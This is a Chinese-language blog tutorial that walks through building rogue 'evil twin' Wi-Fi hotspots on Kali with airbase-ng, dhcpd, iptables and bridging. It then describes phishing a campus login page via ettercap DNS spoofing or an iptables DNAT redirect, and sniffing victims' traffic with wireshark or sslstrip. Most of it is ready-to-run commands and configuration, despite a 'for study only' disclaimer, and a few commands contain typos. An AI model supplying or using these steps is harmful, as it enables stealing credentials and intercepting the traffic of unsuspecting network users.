聲明:本文只用於交流學習,請勿非法使用

自從買了一塊無線網卡後,就時不時折騰kali的無線模塊,然後發現了很多有意思的玩法,本文把一些偽造釣魚wifi的方法記錄下來,歡迎有興趣的小夥伴一起交流( ﹡?o?﹡ )

1、搭建dhcp服務進行熱點偽造

這種方法的原理是在本地偽造熱點後,自己再啟動一個dhcp伺服器,受害者的ip地址是由本機分配的。

首先啟動網卡並偽造熱點,我的機器上網的是無線網卡wlan0,進行偽造熱點的網卡是wlan1

airmon-ng start wlan1
airbase-ng -e "seu-free" wlan1mon

然後配置dhcp伺服器,配置文件是 /etc/dhcp/dhcpd.conf

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 114.114.114.114;
range 10.0.0.10 10.0.0.100;
}

在這裡我們設定的子網ip地址範圍是10.0.0.10到10.0.0.100,域名伺服器地址是114.114.114.114,默認路由為10.0.01

接著配置偽造熱點的虛擬網卡at0,ip設為上述的路由地址

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0

然後開啟轉發並配置路由表

echo 1 > /proc/sys/net/ipv4/ip_forward
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

我們需要把所有流經at0的流量轉發到能上網的網卡wlan0,這樣連上本機的設備才能上網

#清空原有規則
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
#接受所有轉發報文
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
#將所有報文轉發到wlan0
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
#這句很重要,協商tcp mss,自適應mtu,如果設置不對很多網頁可能會訪問不了
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --clamp-mss-to-pmtu

最後就可以開啟dhcp服務啦

dhcpd -cf /etc/dhcp/dhcpd.conf at0

2、通過橋接進行熱點偽造

這種方法操作簡單一點,原理是將上網的網卡橋接到偽造熱點的網卡,這樣連接上釣魚wifi的流量會自動轉發到路由器,ip地址是由路由器分配的。

這種方法偽造熱點我是在windows虛擬機中完成的,原因是橋接的時候必須是有線網卡(eth0)

先開啟熱點和ip轉發

airmon-ng start wlan
airbase-ng -e "seu-free" wlan0mon
echo 1 > /proc/sys/net/ipv4/ip_forward

將at0、eth0進行橋接

apt-get install bridge-utils
brctl addbr bridge
brctl addif bridge eth0
brctl addif bridge eth0

配置橋接網卡的ip地址(配置成eth0之前的地址就行)

#由於是橋接,eth0,at0不能有ip地址
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig bridge 192.168.1.110 up
route add -net 0.0.0.0 netmask 0.0.0.0 ge 192.168.1.1

3、使用工具wifi-pumpkin

[ github地址 ](P0cL4bs/WiFi-Pumpkin)

具體使用就不用說了,傻瓜式的點擊就行。它的原理類似第一種方法,自帶了很多插件,不過用的時候有時會出現連上wifi卻上不了網的情況,大家可以試一試。

4 、利用釣魚wifi盜取用戶數據(實驗)

學校的wifi是需要登錄認證才能上網的,如果用戶連接上釣魚wifi,我們把頁面重定向到一個和認證頁面一模一樣的釣魚頁面,誘使用戶輸入用戶名密碼,這樣就可以輕而易舉獲取用戶信息。我做的一個偽造頁面如下所示:

有兩種方法可以讓用戶訪問這個頁面,一種是dns欺騙,還有一種是流量轉發。

  • dns欺騙的原理是修改dns查詢返回的報文,將域名解析到自己定義的ip,這種方法欺騙性極高,可以通過ettercap進行dns欺騙。

首先編輯 /etc/ettercap/etter.dns,根據示例編輯域名和要解析的地址

* <偽造頁面的ip> # *匹配所有域名

進行欺騙:

ettercap -T -q -i at0 -P dns_spoof

  • 還有一種方法是直接把所有流量轉發到目標ip,也就是配置iptables,如下所示

iptables -t nat -A PREROUTING -p tcp -m multiport --dport 80,8080 -j DNAT --to <偽造頁面的ip>:80

與dns欺騙不同的是,這種方法地址欄會顯示成目標ip。

當然,受害者連上釣魚wifi後,還可以用wireshark或是sslstrip嗅探用戶數據包。這樣,他訪問的所有頁面都能被你看到 (>y<)


推薦閱讀:
相關文章